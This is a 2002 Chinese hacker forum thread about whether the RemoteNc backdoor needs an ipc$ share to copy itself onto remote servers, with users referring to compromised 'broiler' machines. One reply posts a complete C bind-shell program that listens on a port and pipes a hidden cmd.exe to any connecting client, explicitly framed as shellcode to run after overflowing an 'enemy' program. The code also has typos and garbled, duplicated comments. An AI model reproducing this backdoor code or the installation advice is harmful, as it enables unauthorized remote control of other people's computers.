榕老大出来看看！知道的也可以回答！

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

榕老大出来看看！知道的也可以回答！

■ 回复数：30　◆ 点击数：1129

将此页发给您的朋友

作者

主题: 榕老大出来看看！知道的也可以回答！ ( 页: 1 2 )

回复 | 收藏 | 打印 | 篇末

楚楚留香

级别：精灵王
威望：6
经验：1
货币：2090
体力：

来源：218.63.89.*
总发帖数：590
注册日期：2001-04-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

榕老大！我有个问题：
1、RemoteNc copys itself to remote server的时候需不需要ipc$的支持？（是copy的那个过程）
2、如果不需要！是如何实现的?能给段c或者C++代码出来吗？

----------------------------------------------------------
我竟改掉了落泪，也许是因为在黑暗中变得成熟了；成熟是因为心死了一半，心死了一半是因为没有了希望；没了希望是因为人们把我的退路断了；退路断了是因为这社会他妈的不想让我好好的活；这社会他妈的不想让我好好活是因为我从不肯妥协；我从不肯妥协是因为我还没人性的活着；我还没人性的活着是因为心中还有那么一点点的希望……

编辑　

删除　

发表于 2002-04-08.10:32:48　

IP: 已记录

19821119 帅哥哦

级别：管理员
威望：3
经验：0
货币：6
体力： -0.0437

来源：19821119
总发帖数：1801
注册日期：2002-01-29

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

向老大要代码?

----------------------------------------------------------
19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119 19821119

编辑　

删除　

发表于 2002-04-08.10:52:43　

IP: 已记录

shell

级别：中级站友
威望：0
经验：0
货币：
体力：

来源：广东
总发帖数：59
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

将肉鸡或自己的机子ipc空连接去掉，看remotenc能不能装上去。

编辑　

删除　

发表于 2002-04-08.11:28:45　

IP: 已记录

roger_gao 帅哥哦

级别：老站友
威望：0
经验：0
货币：55
体力：

来源：210.74.188.*
总发帖数：239
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

装不了！

编辑　

删除　

发表于 2002-04-08.12:17:57　

IP: 已记录

楚楚留香

级别：精灵王
威望：6
经验：1
货币：2090
体力：

来源：218.63.89.*
总发帖数：590
注册日期：2001-04-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

别乱说！！！！！！！！
和ipc空连接没有关系！

编辑　

删除　

发表于 2002-04-08.12:21:09　

IP: 已记录

roger_gao 帅哥哦

级别：老站友
威望：0
经验：0
货币：55
体力：

来源：210.74.188.*
总发帖数：239
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谁说我乱说！remotenc这后门是需要ipc向远程复制文件的，没有ipc共享肯定不行！

编辑　

删除　

发表于 2002-04-08.12:27:14　

IP: 已记录

roger_gao 帅哥哦

级别：老站友
威望：0
经验：0
货币：55
体力：

来源：210.74.188.*
总发帖数：239
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

看看这篇文章就知道了，你明明在问问题，我好心回答你还说我乱说！！！
http://www.netxeyes.com/cgi-bin/bbs3000/bbs.cgi?menu=show&slttitle=20020404104244&id=tech

编辑　

删除　

发表于 2002-04-08.12:29:54　

IP: 已记录

sunkhawk 帅哥哦

级别：一般站友
威望：0
经验：0
货币：
体力：

来源：61.155.170.*
总发帖数：25
注册日期：2002-04-05

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

it'not necessarily that rnc.exe used ipc to copy files,acturally,we can use ftp or tftp to upload files
i suggest you go http://www.sandflee.net to down the files about rnc provided by meteor

that's all thanks

编辑　

删除　

发表于 2002-04-08.13:05:51　

IP: 已记录

楚楚留香

级别：精灵王
威望：6
经验：1
货币：2090
体力：

来源：218.63.91.*
总发帖数：590
注册日期：2001-04-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由 roger_gao 发表:
看看这篇文章就知道了，你明明在问问题，我好心回答你还说我乱说！！！
http://www.netxeyes.com/cgi-bin/bbs3000/bbs.cgi?menu=show&slttitle=20020404104244&id=tech

ipc$==ipc空连接！谁告诉你的？？你好好看看我的问题！但是我告诉你ipc$!=ipc空连接！

编辑　

删除　

发表于 2002-04-08.13:20:35　

IP: 已记录

roger_gao 帅哥哦

级别：老站友
威望：0
经验：0
货币：55
体力：

来源：210.74.188.*
总发帖数：239
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

没有ipc$共享当然无法建立ipc空连接！

编辑　

删除　

发表于 2002-04-08.13:23:47　

IP: 已记录

shell

级别：中级站友
威望：0
经验：0
货币：
体力：

来源：广东
总发帖数：59
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

如何开一个远程shell呢？
思路是这样的：首先使敌人的程序溢出，让他执行我们的shellcode。
我们的shellcode的功能就是在敌人的机器上用某个端口开一个telnetd 服务器，
然后等待客户来的连接。当客户连接上之后，为这个客户开创一个cmd.exe，
把客户的输入输出和cmd.exe的输入输出联系起来，我们
远程的使用者就有了一个远程shell（跟telnet一样啦）。

上面的算法我想大家都该想得到，这里面socket部分比较简单。和Unix下的基本
差不多。就是加了一个WSAStartup；为客户开创一个cmd.exe，就是用CreateProcess
来创建这个子进程；但是如何把客户的输入输出和cmd.exe的输出输入联系起来呢？
我使用了匿名管道（Anonymous Pipe)来完成这个联系过程。

管道（Pipe）是一种简单的进程间通信（IPC）机制。在Windows NT,2000,98,95下都
可以使用。管道分有名和匿名两种，命名管道可以在同一台机器的不同进程间以及不同机器
上的不同进程之间进行双向通信（使用UNC命名规范）。

匿名管道只是在父子进程之间或者一个进程的两个子进程之间进行通信。他是单向的。
匿名管道其实是通过用给了一个指定名字的有名管道来实现的。

管道的最大好处在于：他可以象对普通文件一样进行操作。
他的操作标示符是HANDLE,也就是说，他可以使用readFile，
WriteFile函数来进行与底层实现无关的读写操作！用户根本就不必了解网络间/进程间
通信的具体细节。

下面就是这个算法的C实现：

/****************************************************************************/
/* Telnetd.cpp By Ipxodi tested in win2000
To illustrated the method of telnetd.
Only one connection can be accept,
feel free to add select... to fit for multiple client
*/

int main()
{
WSADATA wsa;
SOCKET listenFD;
char Buff[1024];
int ret;

WSAStartup(MAKEWORD(2,2),&wsa);

listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

struct sockaddr_in server;

server.sin_family = AF_INET;
server.sin_port = htons(53764);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
int iAddrSize = sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
/*
这段代码是用来建立一个Tcp Server的，我们先申请一个socketfd，
使用53764（随便，多少都行）作为这个socket连接的端口，bind他，
然后在这个端口上等待连接listen。程序阻塞在accept函数直到有
client连接上来。
*/
SECURITY_ATTRIBUTES sa;
sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
/*
创建两个匿名管道。hReadPipe只能用来读管道，hWritePipe1只能用来写管道。
*/
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
char cmdLine[] = "cmd.exe";
PROCESS_INFORMATION ProcessInformation;

ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInforrmation);
/*
这段代码创建了一个shell（cmd.exe），并且把cmd.exe的标准输入用第二个管道?
读句柄替换。cmd.exe的标准输出和标准错误输出用第一个管道的写句柄替换。
这两个管道的逻辑示意图如下：
(父进程) read<－－－〔管道一〕<－－－write 标准输出(cmd.exe子进程)
(父进程) write－－－>〔管道二〕－－－>read 标准输入(cmd.exe子进程)
*/

unsigned long lBytesRead;
while(1) {
ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if(lBytesRead) {
ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret=send(clientFD,Buff,lBytesRead,0);
if(ret<=0) break;
}else {
lBytesRead=recv(clientFD,Buff,1024,0);
if(lBytesRead<=0) break;
ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
if(!ret) break;
}
}
/*
这段代码完成了客户输入和shell的交互。PeekNamedPipe用来异步的查询管道一，
看看shell是否有输出。如果有就readfile读出来，并发送给客户。如果没有，
就去接受客户的输入。并writefile写入管道传递给shell.
这两个管道与client和server的配合逻辑图如下：
输入命令(Client) <-- send(父进程) read<--〔管道一〕<--write 北曜输出(cmd.exe子进程)
获得结果(Client) recv-->(父进程)write-->〔管道二〕-->read 标准适淙?cmd.exe子进程)

/*
这段代码完成了客户输入和shell的交互。PeekNamedPipe用来异步的查询管道一，
看看shell是否有输出。如果有就readfile读出来，并发送给客户。如果没有，
就去接受客户的输入。并writefile写入管道传递给shell.
这两个管道与client和server的配合逻辑图如下：
输入命令(Client) <-- send(父进程) read<--〔管道一〕<--write ?
获得结果(Client) recv-->(父进程)write-->〔管道二〕-->read 标准?

*/
return 0;
}
/****************************************************************************/

编辑　

删除　

发表于 2002-04-08.13:30:58　

IP: 已记录

痞菜

级别：管理员
威望：9
经验：15
货币：99939
体力：

来源：不知道
总发帖数：2601
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谢谢谢谢

----------------------------------------------------------

哈哈

编辑　

删除　

发表于 2002-04-08.14:28:27　

IP: 已记录

影

级别：老站友
威望：0
经验：0
货币：875
体力：

来源：北京
总发帖数：353
注册日期：2001-04-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

为什么都是c的代码？除了sock那部分可以看懂，剩下的就不明白了，
我想需要ipc$的支持吧

编辑　

删除　

发表于 2002-04-08.14:57:44　

IP: 已记录

楚楚留香

级别：精灵王
威望：6
经验：1
货币：2090
体力：

来源：218.63.89.*
总发帖数：590
注册日期：2001-04-17

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由影发表:
为什么都是c的代码？除了sock那部分可以看懂，剩下的就不明白了，
我想需要ipc$的支持吧

我想在copy files的时候也需要！（以后不需要！）但有人告诉没有ipc$的也可以做到！

编辑　

删除　

发表于 2002-04-08.15:01:01　

IP: 已记录

影

级别：老站友
威望：0
经验：0
货币：875
体力：

来源：北京
总发帖数：353
注册日期：2001-04-26

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

你可以试试啊，留香，你先copyfiles，然后看看net use下有没有连接，
然后删除连接，在试试，然后你在看看net use下有没有

编辑　

删除　

发表于 2002-04-08.15:13:27　

IP: 已记录

痞菜

级别：管理员
威望：9
经验：15
货币：99939
体力：

来源：不知道
总发帖数：2601
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由楚楚留香发表:

我想在copy files的时候也需要！（以后不需要！）但有人告诉没有ipc$的也可以做到！

没有ipc 那是不可能的呀2000没有几个可以上传的办法

----------------------------------------------------------

哈哈

编辑　

删除　

发表于 2002-04-08.15:19:00　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP [第 1 2 页]